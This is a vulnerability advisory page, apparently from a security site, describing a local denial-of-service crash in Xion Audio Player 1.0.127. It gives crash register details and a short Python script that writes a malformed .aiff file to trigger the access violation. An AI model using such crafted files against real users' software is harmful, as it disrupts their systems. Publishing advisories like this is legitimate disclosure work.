Xion Audio Player 1.0.127 Denial Of Service

2012.04.05
Credit: condis
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/python # ------------------------------------------------------------------- # Xion Audio Player 1.0.127 (.aiff) Denial of Service Vulnerability # found by condis # # Download : http://xion.r2.com.au/index.php?page=download # Tested on : Windows XP SP3 Professional PL # # Registers : # # EAX 00000000 # ECX 02D0B488 # EDX 7C90E4F4 ntdll.KiFastSystemCallRet # EBX 02D0B4F8 # ESP 02D0B4F8 # EBP 02D0CA60 # ESI 003D8D80 # EDI 00001A00 # EIP 11013C18 BASS.11013C18 # # 11013C18 C740 20 01000000 MOV DWORD PTR DS:[EAX+20],1 <--- crash # # "Access Violation while writing to 00000020" # # I've also found this kind of bug while playing around with .flac # files so I think that handling all of the supported formats must be # really messed up :< # -------------------------------------------------------------------- evil = "FORM\x00\x00\x37\xA4AIFFCOMM" evil += "A" # <--- crash (rest of the file doesn't matters) aiff = open('xion-crash.aiff', 'w') aiff.write(evil) aiff.close() print "Malicious .aiff file has been created. Enjoy"

References:

http://xion.r2.com.au/index.php?page=download


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top